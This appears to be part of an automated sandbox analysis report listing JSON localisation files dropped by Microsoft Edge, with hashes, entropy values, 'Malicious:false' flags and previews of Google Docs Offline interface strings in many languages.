                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2230
                                                                                                                                                                                                                  Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                  MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                  SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                  SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                  SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1160
                                                                                                                                                                                                                  Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                  MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                  SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                  SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                  SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  File Type:JSON data
